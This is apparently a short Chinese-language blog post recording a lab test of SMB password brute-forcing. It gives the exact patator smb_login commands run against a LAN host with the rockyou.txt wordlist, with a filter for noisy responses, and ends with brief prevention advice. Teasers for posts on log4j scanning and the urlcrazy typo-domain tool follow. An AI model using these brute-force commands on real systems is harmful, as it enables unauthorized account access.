patator 之 smb_login 測試

作者: -

 使用patator 模組 的 smb_login, 對 LAN 一台目標電腦(IP: 192.168.8.234)    進行暴力帳密破解

rockyou.txt 是字典檔

目前是攻擊電腦(IP:192.168.8.147),  目標電腦(IP: 192.168.8.234) 

指令: 

先簡單執行

sudo patator smb_login host=192.168.8.234 user=FILE0 password=FILE0 0=rockyou.txt

發現跑出非常多STATUS_LOGON_TYPE_NOT_GRANTED



新指令: 排除 STATUS_LOGON_TYPE_NOT_GRANTED這回應的資訊輸出

sudo patator smb_login host=192.168.8.234 user=FILE0 password=FILE0 0=rockyou.txt -x ignore:fgrep=STATUS_LOGON_TYPE_NOT_GRANTED


對訊息而言: 找到 帳號 administrator是存在且開通, 只是密碼無法進入


在 目標電腦(IP: 192.168.8.234) 端
輸入nestat 會出現 十組 connecting



如何預防呢?
對目標電腦(IP: 192.168.8.234) , 單純 window內建防火牆 是不會阻止
只能透過加裝的防毒防火牆軟體



留言

張貼留言

這個網誌中的熱門文章

用趨勢偵測 log4j

作者: -
圖片
 ***************************************************** 電腦設備有安裝log4j套件(可能 Apache性質居多) 可能就被當成入侵跳板 以公司對外主機 為主 ***************************************************** 趨勢 提供 免費偵測 (有限天數, 不限台數) 以自己 公司或私人 都可 註冊登入 使用 ***************************************************** 使用 chrome開啟網頁 https://www.trendmicro.com/zh_tw/apache-log4j-vulnerability.html 按 免費 掃描工具   輸入 右邊基本資料 (email 要正確) (會寄發 認證 號碼)  註冊登入成功 後, 出現  按 Get start 可選擇 下載 軟體~ 在其自己 主機(window 或 Linux 或 MacOS) 執行 執行畫面(window版)(免安裝) 偵測後 畫面 下方出現結果 可以趁機電腦 逐台執行偵測 , 都會產生報表 於 這畫面 最後建議:  1. 若 主機加裝特定 防毒防火牆軟體 可以 阻止 2. 防火牆 設定禁止這樣 字串 可阻止 3. 更新這套件的修補程式 ========================================================== 登入這網址 就可以看檢測 https://login.xdr.trendmicro.com/idp/clp/xdr?RelayState=/http%3A%2F%2Fsuccess%2F%3Frs%3D%2F%23%2Fapp%2Fasm ==========================================================
閱讀完整內容

urlcrazy 真的很crazy

作者: -
圖片
 透過輸入網址,去推敲組合道網域前面,測試是否存在該網址位置,這可以當假訊息釣魚網站或一些名稱特性的猜測 安裝 sudo apt-get install urlcrazy 執行: sudo urlcrazy  <網域> URLCrazy version 0.7.1 by Andrew Horton (urbanadventurer)                                        Visit http://www.morningstarsecurity.com/research/urlcrazy Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. Supports the following domain variations: Character omission, character repeat, adjacent character swap, adjacent character replacement, double  character replacement, adjacent character insertion, missing dot, strip dashes, insert dash, singular or pluralise, common misspellings, vowel swaps, homophones, bit flipping (cosmic rays), homoglyphs, wrong top level domain, and wrong second level domain. Usage: ./urlcrazy [options] domain Options -k, --keyboard=LAYOUT  Options are: qwerty, azerty, qwertz, dvorak (default: qwerty) -p, --popularity       Check domain popularity with Google -r, -
閱讀完整內容